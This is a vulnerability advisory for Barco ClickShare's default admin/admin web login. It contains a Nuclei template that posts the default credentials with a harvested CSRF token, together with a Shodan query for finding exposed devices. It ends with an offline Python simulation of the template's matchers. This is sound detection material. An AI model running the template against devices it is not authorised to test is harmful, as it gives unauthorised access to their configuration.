barco-clickshare-default-login: Barco ClickShare - Default Login

Date: 2025-08-01 | Affected software: Barco ClickShare | PoC: public

Vulnerability description

Barco ClickShare contains a default login vulnerability: the web login accepts the default credentials (username 'admin', password 'admin'), so an unchanged factory password grants access to the device's configuration interface.

PoC code [public]

id: barco-clickshare-default-login

info:
  name: Barco ClickShare - Default Login
  author: ritikchaddha
  severity: high
  description: |
    Barco ClickShare contains a default login vulnerability. Default login password 'admin' was found.
  classification:
    cpe: cpe:2.3:o:barco:clickshare_cs-100_huddle_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: barco
    product: clickshare_cs-100_huddle_firmware
    shodan-query: "ClickShareSession"
  tags: default-login,barco,clickshare,vuln

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /login/log_me_in HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_protection_token={{token}}&username={{username}}&password={{password}}&eula_accepted=true
      - |
        GET /configuration_wizard HTTP/1.1
        Host: {{Hostname}}

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 303 || status_code_2 == 302'
          - 'contains(body_3, "ClickShare Configuration Wizard")'
          - 'contains(location_2, "/dashboard")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: token
        group: 1
        regex:
          - '="csrf_protection_token" value="([0-9a-z]+)" \/>'
        internal: true
# digest: 4a0a00473045022100e15d5b5366ea779fe5e4b1e83229b7abe635448cb3a8ade3ddae9a7e7055dd46022047eadc94f41ed7592d60c0d0df79e21a8a5feead9998a8fff744e3a0b19c8b18:922c64590222798bb761d5b6d8e72950
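As an added illustration that is not part of the original page or the template author's code, the following Python reproduces offline how the template above evaluates a target: the regex extractor pulls the CSRF token from the first response, and the three DSL matchers (status of request 2, Location header of request 2, body of request 3) are combined with `condition: and`. The response structure, sample HTML, and token value are constructed assumptions; the two flows model a device that still accepts the default credentials and a device whose admin password has been changed, so a defender can see exactly which response characteristics the check keys on.

```python
import re
from dataclasses import dataclass, field

# Regex copied verbatim from the template's extractor; group 1 is the token.
CSRF_TOKEN_RE = re.compile(r'="csrf_protection_token" value="([0-9a-z]+)" \/>')

# Literal the template's body_3 matcher looks for on the post-login page.
WIZARD_MARKER = "ClickShare Configuration Wizard"


@dataclass
class Response:
    """Minimal stand-in for one HTTP response in the raw request chain (constructed)."""
    status_code: int
    body: str = ""
    headers: dict = field(default_factory=dict)


def extract_csrf_token(body: str):
    """Mirror the template's `internal: true` extractor: return group 1 or None."""
    m = CSRF_TOKEN_RE.search(body)
    return m.group(1) if m else None


def evaluate_matchers(responses):
    """Apply the template's three DSL matchers with `condition: and`.

    responses[0], [1], [2] correspond to Nuclei's _1, _2, _3 suffixes:
      status_code_2 == 303 || status_code_2 == 302
      contains(body_3, "ClickShare Configuration Wizard")
      contains(location_2, "/dashboard")
    """
    if len(responses) < 3:
        return False  # chain aborted early: nothing to match on
    r2, r3 = responses[1], responses[2]
    redirected = r2.status_code in (302, 303)
    wizard_shown = WIZARD_MARKER in r3.body
    sent_to_dashboard = "/dashboard" in r2.headers.get("Location", "")
    return redirected and wizard_shown and sent_to_dashboard


# --- Constructed sample data (not captured from a real device) ---
LOGIN_PAGE = (
    '<form method="post" action="/login/log_me_in">'
    '<input type="hidden" name="csrf_protection_token" value="3f9a1c" />'
    '</form>'
)

# Device still on factory credentials: login redirects to the dashboard and
# the configuration wizard page is reachable.
DEFAULT_CREDS_FLOW = [
    Response(200, LOGIN_PAGE),
    Response(302, "", {"Location": "/dashboard"}),
    Response(200, "<title>ClickShare Configuration Wizard</title>"),
]

# Device with a changed admin password: the login form is re-served with an
# error and the wizard page is never reached.
HARDENED_FLOW = [
    Response(200, LOGIN_PAGE),
    Response(200, LOGIN_PAGE + "<p>Invalid username or password</p>"),
    Response(302, "", {"Location": "/login"}),
]


if __name__ == "__main__":
    print("token:", extract_csrf_token(LOGIN_PAGE))
    print("default creds flow matches:", evaluate_matchers(DEFAULT_CREDS_FLOW))
    print("hardened flow matches:", evaluate_matchers(HARDENED_FLOW))
```

Because all three matchers must hold, a device that merely returns a 302 on a failed login (for example back to `/login`) does not produce a finding; the check requires both the dashboard redirect and the wizard page, which is why the hardened flow evaluates to false even though it contains a redirect.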